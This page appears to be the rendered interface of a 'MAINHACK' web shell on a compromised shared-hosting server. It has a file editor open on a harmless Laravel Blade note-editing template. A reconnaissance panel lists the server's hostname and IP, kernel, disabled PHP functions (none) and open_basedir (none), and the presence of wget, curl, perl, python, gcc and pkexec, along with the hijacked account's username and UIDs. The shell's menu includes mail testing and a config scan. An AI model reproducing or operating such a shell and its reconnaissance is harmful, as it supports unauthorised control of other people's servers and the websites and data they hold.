[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: edit.blade.php
<div class="modal-dialog modal-lg" role="document"> {!! Form::open(['url' => action([\App\Http\Controllers\DocumentAndNoteController::class, 'update'], $document_note->id), 'id' => 'docus_notes_form', 'method' => 'put']) !!} <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> <h4 class="modal-title">@lang('lang_v1.edit_note')</h4> </div> <div class="modal-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> {!! Form::label('heading', __('lang_v1.heading') . ':*' )!!} {!! Form::text('heading', $document_note->heading, ['class' => 'form-control', 'required' ]) !!} </div> </div> </div> <!-- model id like project_id, user_id --> {!! Form::hidden('notable_id', $document_note->notable_id, ['class' => 'form-control']) !!} <!-- model name like App\User --> {!! Form::hidden('notable_type', $notable_type, ['class' => 'form-control']) !!} <div class="row"> <div class="col-md-12"> <div class="form-group"> {!! Form::label('description', __('lang_v1.description') . ':') !!} {!! Form::textarea('description', $document_note->description, ['class' => 'form-control ', 'id' => 'docs_note_description']); !!} </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="fileupload"> @lang('lang_v1.documents'): </label> <div class="dropzone" id="docusUpload"></div> </div> <input type="hidden" id="docus_notes_media" name="file_name[]" value=""> </div> </div> @if(Auth::user()->id == $document_note->created_by) <div class="row"> <div class="col-md-4"> <div class="form-group"> <div class="checkbox"> <label> <input type="checkbox" name="is_private" value="1" @if($document_note->is_private) checked @endif> @lang('lang_v1.is_private') <i class="fa fa-info-circle" data-toggle="tooltip" title="@lang('lang_v1.note_will_be_visible_to_u_only')"></i> </label> </div> </div> </div> </div> @endif </div> <div class="modal-footer"> <button type="submit" class="tw-dw-btn tw-dw-btn-primary tw-text-white"> @lang('messages.update') </button> <button type="button" class="tw-dw-btn tw-dw-btn-neutral tw-text-white" data-dismiss="modal"> @lang('messages.close') </button> </div> </div><!-- /.modal-content --> {!! Form::close() !!} </div><!-- /.modal-dialog -->
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285